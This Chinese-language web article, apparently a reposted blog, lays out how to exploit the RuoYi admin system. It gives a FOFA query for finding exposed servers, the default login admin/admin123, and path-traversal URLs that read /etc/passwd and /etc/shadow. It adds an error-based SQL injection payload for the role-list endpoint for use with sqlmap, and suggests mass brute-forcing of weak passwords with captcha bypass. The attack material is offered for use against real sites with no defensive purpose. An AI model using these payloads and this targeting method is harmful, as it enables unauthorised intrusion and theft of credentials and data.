栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

若依关系系统漏洞利用

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

若依关系系统漏洞利用

若依(RuoYi)管理系统 后台任意文件读取,SQL注入

 一、若依管理系统简介

 基于SpringBoot的权限管理系统 易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用

二、若依管理系统后台任意文件下载

该漏洞需要登陆后台后进行测试,该管理系统多为默认账户密码

fofa搜索语句:app=”若依-管理系统”

账号:admin

密码:admin123

登陆成功后直接访问

http://目标网站url/common/download/resource?resource=/profile/../../../../etc/passwd
http://目标网站url//common/download/resource?resource=/profile/../../../../etc/shadow

三、若依管理系统SQL注入漏洞

该漏洞需要登陆后台后进行测试,该管理系统多为默认账户密码

直接burp抓包构造POST请求数据包(构建关键点)

1.POST请求

2.请求目录/system/role/list

3.请求POC(见下文)

POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and
extractvalue(1,concat(0x7e,substring((*),1,32),0x7e))

POC我直接写的星号指定注入位置,可以直接放到sqlmap中去跑,不指定位置sqlmap跑不出来(可能是我太笨了)

ps:有兴趣的同学可以写个脚本去跑(大佬和小白就不用看了,闲人专享)

简单思路可以先去批量去跑弱口令,这个很快,验证码是可以通过验证码识别网站去绕过的,登陆到后台之后构建请求包,博主已经实现了,代码过于杂乱就不分享了。

 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/271928.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号